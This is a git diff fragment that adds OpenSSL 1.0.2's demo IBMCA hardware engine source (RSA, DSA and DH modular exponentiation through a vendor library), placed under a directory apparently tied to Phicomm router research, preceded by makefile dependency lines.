+rsaref.o: ../../../include/openssl/e_os2.h ../../../include/openssl/engine.h
+rsaref.o: ../../../include/openssl/err.h ../../../include/openssl/lhash.h
+rsaref.o: ../../../include/openssl/opensslconf.h
+rsaref.o: ../../../include/openssl/opensslv.h
+rsaref.o: ../../../include/openssl/ossl_typ.h ../../../include/openssl/rand.h
+rsaref.o: ../../../include/openssl/rsa.h ../../../include/openssl/safestack.h
+rsaref.o: ../../../include/openssl/stack.h ../../../include/openssl/symhacks.h
+rsaref.o: ../../../include/openssl/ui.h rsaref.c rsaref_err.c rsaref_err.h
+rsaref.o: source/des.h source/global.h source/md2.h source/md5.h source/rsa.h
+rsaref.o: source/rsaref.h
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca.c
new file mode 100644
index 0000000..082246f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/ibmca/hw_ibmca.c
@@ -0,0 +1,900 @@
+/* crypto/engine/hw_ibmca.c */
+/*
+ * Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* (C) COPYRIGHT International Business Machines Corp. 2001 */
+
+#include <stdio.h>
+#include <openssl/crypto.h>
+#include <openssl/dso.h>
+#include <openssl/engine.h>
+
+#ifndef OPENSSL_NO_HW
+# ifndef OPENSSL_NO_HW_IBMCA
+
+#  ifdef FLAT_INC
+#   include "ica_openssl_api.h"
+#  else
+#   include "vendor_defns/ica_openssl_api.h"
+#  endif
+
+#  define IBMCA_LIB_NAME "ibmca engine"
+#  include "hw_ibmca_err.c"
+
+static int ibmca_destroy(ENGINE *e);
+static int ibmca_init(ENGINE *e);
+static int ibmca_finish(ENGINE *e);
+static int ibmca_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) ());
+
+static const char *IBMCA_F1 = "icaOpenAdapter";
+static const char *IBMCA_F2 = "icaCloseAdapter";
+static const char *IBMCA_F3 = "icaRsaModExpo";
+static const char *IBMCA_F4 = "icaRandomNumberGenerate";
+static const char *IBMCA_F5 = "icaRsaCrt";
+
+ICA_ADAPTER_HANDLE handle = 0;
+
+/* BIGNUM stuff */
+static int ibmca_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx);
+
+static int ibmca_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *q, const BIGNUM *dmp1,
+                             const BIGNUM *dmq1, const BIGNUM *iqmp,
+                             BN_CTX *ctx);
+
+#  ifndef OPENSSL_NO_RSA
+/* RSA stuff */
+static int ibmca_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa);
+#  endif
+
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int ibmca_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx);
+
+#  ifndef OPENSSL_NO_DSA
+/* DSA stuff */
+static int ibmca_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                             BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                             BN_CTX *ctx, BN_MONT_CTX *in_mont);
+static int ibmca_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                             const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx);
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* DH stuff */
+/* This function is alised to mod_exp (with the DH and mont dropped). */
+static int ibmca_mod_exp_dh(const DH *dh, BIGNUM *r,
+                            const BIGNUM *a, const BIGNUM *p,
+                            const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+#  endif
+
+/* RAND stuff */
+static int ibmca_rand_bytes(unsigned char *buf, int num);
+static int ibmca_rand_status(void);
+
+/* WJH - check for more commands, like in nuron */
+
+/* The definitions for control commands specific to this engine */
+#  define IBMCA_CMD_SO_PATH               ENGINE_CMD_BASE
+static const ENGINE_CMD_DEFN ibmca_cmd_defns[] = {
+    {IBMCA_CMD_SO_PATH,
+     "SO_PATH",
+     "Specifies the path to the 'atasi' shared library",
+     ENGINE_CMD_FLAG_STRING},
+    {0, NULL, NULL, 0}
+};
+
+#  ifndef OPENSSL_NO_RSA
+/* Our internal RSA_METHOD that we provide pointers to */
+static RSA_METHOD ibmca_rsa = {
+    "Ibmca RSA method",
+    NULL,
+    NULL,
+    NULL,
+    NULL,
+    ibmca_rsa_mod_exp,
+    ibmca_mod_exp_mont,
+    NULL,
+    NULL,
+    0,
+    NULL,
+    NULL,
+    NULL
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* Our internal DSA_METHOD that we provide pointers to */
+static DSA_METHOD ibmca_dsa = {
+    "Ibmca DSA method",
+    NULL,                       /* dsa_do_sign */
+    NULL,                       /* dsa_sign_setup */
+    NULL,                       /* dsa_do_verify */
+    ibmca_dsa_mod_exp,          /* dsa_mod_exp */
+    ibmca_mod_exp_dsa,          /* bn_mod_exp */
+    NULL,                       /* init */
+    NULL,                       /* finish */
+    0,                          /* flags */
+    NULL                        /* app_data */
+};
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+/* Our internal DH_METHOD that we provide pointers to */
+static DH_METHOD ibmca_dh = {
+    "Ibmca DH method",
+    NULL,
+    NULL,
+    ibmca_mod_exp_dh,
+    NULL,
+    NULL,
+    0,
+    NULL
+};
+#  endif
+
+static RAND_METHOD ibmca_rand = {
+    /* "IBMCA RAND method", */
+    NULL,
+    ibmca_rand_bytes,
+    NULL,
+    NULL,
+    ibmca_rand_bytes,
+    ibmca_rand_status,
+};
+
+/* Constants used when creating the ENGINE */
+static const char *engine_ibmca_id = "ibmca";
+static const char *engine_ibmca_name = "Ibmca hardware engine support";
+
+/*
+ * This internal function is used by ENGINE_ibmca() and possibly by the
+ * "dynamic" ENGINE support too
+ */
+static int bind_helper(ENGINE *e)
+{
+#  ifndef OPENSSL_NO_RSA
+    const RSA_METHOD *meth1;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    const DSA_METHOD *meth2;
+#  endif
+#  ifndef OPENSSL_NO_DH
+    const DH_METHOD *meth3;
+#  endif
+    if (!ENGINE_set_id(e, engine_ibmca_id) ||
+        !ENGINE_set_name(e, engine_ibmca_name) ||
+#  ifndef OPENSSL_NO_RSA
+        !ENGINE_set_RSA(e, &ibmca_rsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DSA
+        !ENGINE_set_DSA(e, &ibmca_dsa) ||
+#  endif
+#  ifndef OPENSSL_NO_DH
+        !ENGINE_set_DH(e, &ibmca_dh) ||
+#  endif
+        !ENGINE_set_RAND(e, &ibmca_rand) ||
+        !ENGINE_set_destroy_function(e, ibmca_destroy) ||
+        !ENGINE_set_init_function(e, ibmca_init) ||
+        !ENGINE_set_finish_function(e, ibmca_finish) ||
+        !ENGINE_set_ctrl_function(e, ibmca_ctrl) ||
+        !ENGINE_set_cmd_defns(e, ibmca_cmd_defns))
+        return 0;
+
+#  ifndef OPENSSL_NO_RSA
+    /*
+     * We know that the "PKCS1_SSLeay()" functions hook properly to the
+     * ibmca-specific mod_exp and mod_exp_crt so we use those functions. NB:
+     * We don't use ENGINE_openssl() or anything "more generic" because
+     * something like the RSAref code may not hook properly, and if you own
+     * one of these cards then you have the right to do RSA operations on it
+     * anyway!
+     */
+    meth1 = RSA_PKCS1_SSLeay();
+    ibmca_rsa.rsa_pub_enc = meth1->rsa_pub_enc;
+    ibmca_rsa.rsa_pub_dec = meth1->rsa_pub_dec;
+    ibmca_rsa.rsa_priv_enc = meth1->rsa_priv_enc;
+    ibmca_rsa.rsa_priv_dec = meth1->rsa_priv_dec;
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    /*
+     * Use the DSA_OpenSSL() method and just hook the mod_exp-ish bits.
+     */
+    meth2 = DSA_OpenSSL();
+    ibmca_dsa.dsa_do_sign = meth2->dsa_do_sign;
+    ibmca_dsa.dsa_sign_setup = meth2->dsa_sign_setup;
+    ibmca_dsa.dsa_do_verify = meth2->dsa_do_verify;
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+    /* Much the same for Diffie-Hellman */
+    meth3 = DH_OpenSSL();
+    ibmca_dh.generate_key = meth3->generate_key;
+    ibmca_dh.compute_key = meth3->compute_key;
+#  endif
+
+    /* Ensure the ibmca error handling is set up */
+    ERR_load_IBMCA_strings();
+    return 1;
+}
+
+static ENGINE *engine_ibmca(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_helper(ret)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+#  ifdef ENGINE_DYNAMIC_SUPPORT
+static
+#  endif
+void ENGINE_load_ibmca(void)
+{
+    /* Copied from eng_[openssl|dyn].c */
+    ENGINE *toadd = engine_ibmca();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+
+/* Destructor (complements the "ENGINE_ibmca()" constructor) */
+static int ibmca_destroy(ENGINE *e)
+{
+    /*
+     * Unload the ibmca error strings so any error state including our functs
+     * or reasons won't lead to a segfault (they simply get displayed without
+     * corresponding string data because none will be found).
+     */
+    ERR_unload_IBMCA_strings();
+    return 1;
+}
+
+/*
+ * This is a process-global DSO handle used for loading and unloading the
+ * Ibmca library. NB: This is only set (or unset) during an init() or
+ * finish() call (reference counts permitting) and they're operating with
+ * global locks, so this should be thread-safe implicitly.
+ */
+
+static DSO *ibmca_dso = NULL;
+
+/*
+ * These are the function pointers that are (un)set when the library has
+ * successfully (un)loaded.
+ */
+
+static unsigned int (ICA_CALL * p_icaOpenAdapter) ();
+static unsigned int (ICA_CALL * p_icaCloseAdapter) ();
+static unsigned int (ICA_CALL * p_icaRsaModExpo) ();
+static unsigned int (ICA_CALL * p_icaRandomNumberGenerate) ();
+static unsigned int (ICA_CALL * p_icaRsaCrt) ();
+
+/* utility function to obtain a context */
+static int get_context(ICA_ADAPTER_HANDLE * p_handle)
+{
+    unsigned int status = 0;
+
+    status = p_icaOpenAdapter(0, p_handle);
+    if (status != 0)
+        return 0;
+    return 1;
+}
+
+/* similarly to release one. */
+static void release_context(ICA_ADAPTER_HANDLE handle)
+{
+    p_icaCloseAdapter(handle);
+}
+
+/* (de)initialisation functions. */
+static int ibmca_init(ENGINE *e)
+{
+
+    void (*p1) ();
+    void (*p2) ();
+    void (*p3) ();
+    void (*p4) ();
+    void (*p5) ();
+
+    if (ibmca_dso != NULL) {
+        IBMCAerr(IBMCA_F_IBMCA_INIT, IBMCA_R_ALREADY_LOADED);
+        goto err;
+    }
+    /*
+     * Attempt to load libatasi.so/atasi.dll/whatever. Needs to be changed
+     * unfortunately because the Ibmca drivers don't have standard library
+     * names that can be platform-translated well.
+     */
+    /*
+     * TODO: Work out how to actually map to the names the Ibmca drivers
+     * really use - for now a symbollic link needs to be created on the host
+     * system from libatasi.so to atasi.so on unix variants.
+     */
+
+    /* WJH XXX check name translation */
+
+    ibmca_dso = DSO_load(NULL, IBMCA_LIBNAME, NULL,
+                         /*
+                          * DSO_FLAG_NAME_TRANSLATION
+                          */ 0);
+    if (ibmca_dso == NULL) {
+        IBMCAerr(IBMCA_F_IBMCA_INIT, IBMCA_R_DSO_FAILURE);
+        goto err;
+    }
+
+    if (!(p1 = DSO_bind_func(ibmca_dso, IBMCA_F1)) ||
+        !(p2 = DSO_bind_func(ibmca_dso, IBMCA_F2)) ||
+        !(p3 = DSO_bind_func(ibmca_dso, IBMCA_F3)) ||
+        !(p4 = DSO_bind_func(ibmca_dso, IBMCA_F4)) ||
+        !(p5 = DSO_bind_func(ibmca_dso, IBMCA_F5))) {
+        IBMCAerr(IBMCA_F_IBMCA_INIT, IBMCA_R_DSO_FAILURE);
+        goto err;
+    }
+
+    /* Copy the pointers */
+
+    p_icaOpenAdapter = (unsigned int (ICA_CALL *) ())p1;
+    p_icaCloseAdapter = (unsigned int (ICA_CALL *) ())p2;
+    p_icaRsaModExpo = (unsigned int (ICA_CALL *) ())p3;
+    p_icaRandomNumberGenerate = (unsigned int (ICA_CALL *) ())p4;
+    p_icaRsaCrt = (unsigned int (ICA_CALL *) ())p5;
+
+    if (!get_context(&handle)) {
+        IBMCAerr(IBMCA_F_IBMCA_INIT, IBMCA_R_UNIT_FAILURE);
+        goto err;
+    }
+
+    return 1;
+ err:
+    if (ibmca_dso)
+        DSO_free(ibmca_dso);
+
+    p_icaOpenAdapter = NULL;
+    p_icaCloseAdapter = NULL;
+    p_icaRsaModExpo = NULL;
+    p_icaRandomNumberGenerate = NULL;
+
+    return 0;
+}
+
+static int ibmca_finish(ENGINE *e)
+{
+    if (ibmca_dso == NULL) {
+        IBMCAerr(IBMCA_F_IBMCA_FINISH, IBMCA_R_NOT_LOADED);
+        return 0;
+    }
+    release_context(handle);
+    if (!DSO_free(ibmca_dso)) {
+        IBMCAerr(IBMCA_F_IBMCA_FINISH, IBMCA_R_DSO_FAILURE);
+        return 0;
+    }
+    ibmca_dso = NULL;
+
+    return 1;
+}
+
+static int ibmca_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f) ())
+{
+    int initialised = ((ibmca_dso == NULL) ? 0 : 1);
+    switch (cmd) {
+    case IBMCA_CMD_SO_PATH:
+        if (p == NULL) {
+            IBMCAerr(IBMCA_F_IBMCA_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+            return 0;
+        }
+        if (initialised) {
+            IBMCAerr(IBMCA_F_IBMCA_CTRL, IBMCA_R_ALREADY_LOADED);
+            return 0;
+        }
+        IBMCA_LIBNAME = (const char *)p;
+        return 1;
+    default:
+        break;
+    }
+    IBMCAerr(IBMCA_F_IBMCA_CTRL, IBMCA_R_CTRL_COMMAND_NOT_IMPLEMENTED);
+    return 0;
+}
+
+static int ibmca_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                         const BIGNUM *m, BN_CTX *ctx)
+{
+    /*
+     * I need somewhere to store temporary serialised values for use with the
+     * Ibmca API calls. A neat cheat - I'll use BIGNUMs from the BN_CTX but
+     * access their arrays directly as byte arrays <grin>. This way I don't
+     * have to clean anything up.
+     */
+
+    BIGNUM *argument = NULL;
+    BIGNUM *result = NULL;
+    BIGNUM *key = NULL;
+    int to_return;
+    int inLen, outLen, tmpLen;
+
+    ICA_KEY_RSA_MODEXPO *publKey = NULL;
+    unsigned int rc;
+
+    to_return = 0;              /* expect failure */
+
+    if (!ibmca_dso) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP, IBMCA_R_NOT_LOADED);
+        goto err;
+    }
+    /* Prepare the params */
+    BN_CTX_start(ctx);
+    argument = BN_CTX_get(ctx);
+    result = BN_CTX_get(ctx);
+    key = BN_CTX_get(ctx);
+
+    if (!argument || !result || !key) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP, IBMCA_R_BN_CTX_FULL);
+        goto err;
+    }
+
+    if (!bn_wexpand(argument, m->top) || !bn_wexpand(result, m->top) ||
+        !bn_wexpand(key, sizeof(*publKey) / BN_BYTES)) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP, IBMCA_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    publKey = (ICA_KEY_RSA_MODEXPO *)key->d;
+
+    if (publKey == NULL) {
+        goto err;
+    }
+    memset(publKey, 0, sizeof(ICA_KEY_RSA_MODEXPO));
+
+    publKey->keyType = CORRECT_ENDIANNESS(ME_KEY_TYPE);
+    publKey->keyLength = CORRECT_ENDIANNESS(sizeof(ICA_KEY_RSA_MODEXPO));
+    publKey->expOffset = (char *)publKey->keyRecord - (char *)publKey;
+
+    /*
+     * A quirk of the card: the exponent length has to be the same as the
+     * modulus (key) length
+     */
+
+    outLen = BN_num_bytes(m);
+
+/* check for modulus length SAB*/
+    if (outLen > 256) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP, IBMCA_R_MEXP_LENGTH_TO_LARGE);
+        goto err;
+    }
+/* check for modulus length SAB*/
+
+    publKey->expLength = publKey->nLength = outLen;
+    /*
+     * SAB Check for underflow condition the size of the exponent is less
+     * than the size of the parameter then we have a big problem and will
+     * underflow the keyRecord buffer.  Bad stuff could happen then
+     */
+    if (outLen < BN_num_bytes(p)) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP, IBMCA_R_UNDERFLOW_KEYRECORD);
+        goto err;
+    }
+/* SAB End check for underflow */
+
+    BN_bn2bin(p, &publKey->keyRecord[publKey->expLength - BN_num_bytes(p)]);
+    BN_bn2bin(m, &publKey->keyRecord[publKey->expLength]);
+
+    publKey->modulusBitLength = CORRECT_ENDIANNESS(publKey->nLength * 8);
+    publKey->nOffset = CORRECT_ENDIANNESS(publKey->expOffset +
+                                          publKey->expLength);
+
+    publKey->expOffset = CORRECT_ENDIANNESS((char *)publKey->keyRecord -
+                                            (char *)publKey);
+
+    tmpLen = outLen;
+    publKey->expLength = publKey->nLength = CORRECT_ENDIANNESS(tmpLen);
+
+    /* Prepare the argument */
+
+    memset(argument->d, 0, outLen);
+    BN_bn2bin(a, (unsigned char *)argument->d + outLen - BN_num_bytes(a));
+
+    inLen = outLen;
+
+    /* Perform the operation */
+
+    if ((rc = p_icaRsaModExpo(handle, inLen, (unsigned char *)argument->d,
+                              publKey, &outLen, (unsigned char *)result->d))
+        != 0) {
+        printf("rc = %d\n", rc);
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP, IBMCA_R_REQUEST_FAILED);
+        goto err;
+    }
+
+    /* Convert the response */
+    BN_bin2bn((unsigned char *)result->d, outLen, r);
+    to_return = 1;
+ err:
+    BN_CTX_end(ctx);
+    return to_return;
+}
+
+#  ifndef OPENSSL_NO_RSA
+static int ibmca_rsa_mod_exp(BIGNUM *r0, const BIGNUM *I, RSA *rsa)
+{
+    BN_CTX *ctx;
+    int to_return = 0;
+
+    if ((ctx = BN_CTX_new()) == NULL)
+        goto err;
+    if (!rsa->p || !rsa->q || !rsa->dmp1 || !rsa->dmq1 || !rsa->iqmp) {
+        if (!rsa->d || !rsa->n) {
+            IBMCAerr(IBMCA_F_IBMCA_RSA_MOD_EXP,
+                     IBMCA_R_MISSING_KEY_COMPONENTS);
+            goto err;
+        }
+        to_return = ibmca_mod_exp(r0, I, rsa->d, rsa->n, ctx);
+    } else {
+        to_return = ibmca_mod_exp_crt(r0, I, rsa->p, rsa->q, rsa->dmp1,
+                                      rsa->dmq1, rsa->iqmp, ctx);
+    }
+ err:
+    if (ctx)
+        BN_CTX_free(ctx);
+    return to_return;
+}
+#  endif
+
+/* Ein kleines chinesisches "Restessen"  */
+static int ibmca_mod_exp_crt(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *q, const BIGNUM *dmp1,
+                             const BIGNUM *dmq1, const BIGNUM *iqmp,
+                             BN_CTX *ctx)
+{
+
+    BIGNUM *argument = NULL;
+    BIGNUM *result = NULL;
+    BIGNUM *key = NULL;
+
+    int to_return = 0;          /* expect failure */
+
+    char *pkey = NULL;
+    ICA_KEY_RSA_CRT *privKey = NULL;
+    int inLen, outLen;
+
+    int rc;
+    unsigned int offset, pSize, qSize;
+/* SAB New variables */
+    unsigned int keyRecordSize;
+    unsigned int pbytes = BN_num_bytes(p);
+    unsigned int qbytes = BN_num_bytes(q);
+    unsigned int dmp1bytes = BN_num_bytes(dmp1);
+    unsigned int dmq1bytes = BN_num_bytes(dmq1);
+    unsigned int iqmpbytes = BN_num_bytes(iqmp);
+
+    /* Prepare the params */
+
+    BN_CTX_start(ctx);
+    argument = BN_CTX_get(ctx);
+    result = BN_CTX_get(ctx);
+    key = BN_CTX_get(ctx);
+
+    if (!argument || !result || !key) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_BN_CTX_FULL);
+        goto err;
+    }
+
+    if (!bn_wexpand(argument, p->top + q->top) ||
+        !bn_wexpand(result, p->top + q->top) ||
+        !bn_wexpand(key, sizeof(*privKey) / BN_BYTES)) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    privKey = (ICA_KEY_RSA_CRT *)key->d;
+    /*
+     * SAB Add check for total size in bytes of the parms does not exceed the
+     * buffer space we have do this first
+     */
+    keyRecordSize = pbytes + qbytes + dmp1bytes + dmq1bytes + iqmpbytes;
+    if (keyRecordSize > sizeof(privKey->keyRecord)) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_OPERANDS_TO_LARGE);
+        goto err;
+    }
+
+    if ((qbytes + dmq1bytes) > 256) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_OPERANDS_TO_LARGE);
+        goto err;
+    }
+
+    if (pbytes + dmp1bytes > 256) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_OPERANDS_TO_LARGE);
+        goto err;
+    }
+
+/* end SAB additions */
+
+    memset(privKey, 0, sizeof(ICA_KEY_RSA_CRT));
+    privKey->keyType = CORRECT_ENDIANNESS(CRT_KEY_TYPE);
+    privKey->keyLength = CORRECT_ENDIANNESS(sizeof(ICA_KEY_RSA_CRT));
+    privKey->modulusBitLength = CORRECT_ENDIANNESS(BN_num_bytes(q) * 2 * 8);
+
+    /*
+     * p,dp & qInv are 1 QWORD Larger
+     */
+    privKey->pLength = CORRECT_ENDIANNESS(BN_num_bytes(p) + 8);
+    privKey->qLength = CORRECT_ENDIANNESS(BN_num_bytes(q));
+    privKey->dpLength = CORRECT_ENDIANNESS(BN_num_bytes(dmp1) + 8);
+    privKey->dqLength = CORRECT_ENDIANNESS(BN_num_bytes(dmq1));
+    privKey->qInvLength = CORRECT_ENDIANNESS(BN_num_bytes(iqmp) + 8);
+
+    offset = (char *)privKey->keyRecord - (char *)privKey;
+
+    qSize = BN_num_bytes(q);
+    pSize = qSize + 8;          /* 1 QWORD larger */
+
+    /*
+     * SAB probably aittle redundant, but we'll verify that each of the
+     * components which make up a key record sent ot the card does not exceed
+     * the space that is allocated for it.  this handles the case where even
+     * if the total length does not exceed keyrecord zied, if the operands are
+     * funny sized they could cause potential side affects on either the card
+     * or the result
+     */
+
+    if ((pbytes > pSize) || (dmp1bytes > pSize) ||
+        (iqmpbytes > pSize) || (qbytes > qSize) || (dmq1bytes > qSize)) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_OPERANDS_TO_LARGE);
+        goto err;
+
+    }
+
+    privKey->dpOffset = CORRECT_ENDIANNESS(offset);
+
+    offset += pSize;
+    privKey->dqOffset = CORRECT_ENDIANNESS(offset);
+
+    offset += qSize;
+    privKey->pOffset = CORRECT_ENDIANNESS(offset);
+
+    offset += pSize;
+    privKey->qOffset = CORRECT_ENDIANNESS(offset);
+
+    offset += qSize;
+    privKey->qInvOffset = CORRECT_ENDIANNESS(offset);
+
+    pkey = (char *)privKey->keyRecord;
+
+/* SAB first check that we don;t under flow the buffer */
+    if (pSize < pbytes) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_UNDERFLOW_CONDITION);
+        goto err;
+    }
+
+    /* pkey += pSize - BN_num_bytes(p); WROING this should be dmp1) */
+    pkey += pSize - BN_num_bytes(dmp1);
+    BN_bn2bin(dmp1, pkey);
+    pkey += BN_num_bytes(dmp1); /* move the pointer */
+
+    BN_bn2bin(dmq1, pkey);      /* Copy over dmq1 */
+
+    pkey += qSize;              /* move pointer */
+    /* set up for zero padding of next field */
+    pkey += pSize - BN_num_bytes(p);
+
+    BN_bn2bin(p, pkey);
+    /* increment pointer by number of bytes moved  */
+    pkey += BN_num_bytes(p);
+
+    BN_bn2bin(q, pkey);
+    pkey += qSize;              /* move the pointer */
+    pkey += pSize - BN_num_bytes(iqmp); /* Adjust for padding */
+    BN_bn2bin(iqmp, pkey);
+
+    /* Prepare the argument and response */
+
+    /*
+     * Correct endianess is used because the fields were converted above
+     */
+    outLen = CORRECT_ENDIANNESS(privKey->qLength) * 2;
+
+    if (outLen > 256) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_OUTLEN_TO_LARGE);
+        goto err;
+    }
+
+    /* SAB check for underflow here on the argeument */
+    if (outLen < BN_num_bytes(a)) {
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_UNDERFLOW_CONDITION);
+        goto err;
+    }
+
+    BN_bn2bin(a, (unsigned char *)argument->d + outLen - BN_num_bytes(a));
+    inLen = outLen;
+
+    memset(result->d, 0, outLen);
+
+    /* Perform the operation */
+
+    if ((rc = p_icaRsaCrt(handle, inLen, (unsigned char *)argument->d,
+                          privKey, &outLen, (unsigned char *)result->d)) != 0)
+    {
+        printf("rc = %d\n", rc);
+        IBMCAerr(IBMCA_F_IBMCA_MOD_EXP_CRT, IBMCA_R_REQUEST_FAILED);
+        goto err;
+    }
+
+    /* Convert the response */
+
+    BN_bin2bn((unsigned char *)result->d, outLen, r);
+    to_return = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    return to_return;
+
+}
+
+#  ifndef OPENSSL_NO_DSA
+/*
+ * This code was liberated and adapted from the commented-out code in
+ * dsa_ossl.c. Because of the unoptimised form of the Ibmca acceleration (it
+ * doesn't have a CRT form for RSA), this function means that an Ibmca system
+ * running with a DSA server certificate can handshake around 5 or 6 times
+ * faster/more than an equivalent system running with RSA. Just check out the
+ * "signs" statistics from the RSA and DSA parts of "openssl speed -engine
+ * ibmca dsa1024 rsa1024".
+ */
+static int ibmca_dsa_mod_exp(DSA *dsa, BIGNUM *rr, BIGNUM *a1,
+                             BIGNUM *p1, BIGNUM *a2, BIGNUM *p2, BIGNUM *m,
+                             BN_CTX *ctx, BN_MONT_CTX *in_mont)
+{
+    BIGNUM t;
+    int to_return = 0;
+
+    BN_init(&t);
+    /* let rr = a1 ^ p1 mod m */
+    if (!ibmca_mod_exp(rr, a1, p1, m, ctx))
+        goto end;
+    /* let t = a2 ^ p2 mod m */
+    if (!ibmca_mod_exp(&t, a2, p2, m, ctx))
+        goto end;
+    /* let rr = rr * t mod m */
+    if (!BN_mod_mul(rr, rr, &t, m, ctx))
+        goto end;
+    to_return = 1;
+ end:
+    BN_free(&t);
+    return to_return;
+}
+
+static int ibmca_mod_exp_dsa(DSA *dsa, BIGNUM *r, BIGNUM *a,
+                             const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx,
+                             BN_MONT_CTX *m_ctx)
+{
+    return ibmca_mod_exp(r, a, p, m, ctx);
+}
+#  endif
+
+/* This function is aliased to mod_exp (with the mont stuff dropped). */
+static int ibmca_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                              const BIGNUM *m, BN_CTX *ctx,
+                              BN_MONT_CTX *m_ctx)
+{
+    return ibmca_mod_exp(r, a, p, m, ctx);
+}
+
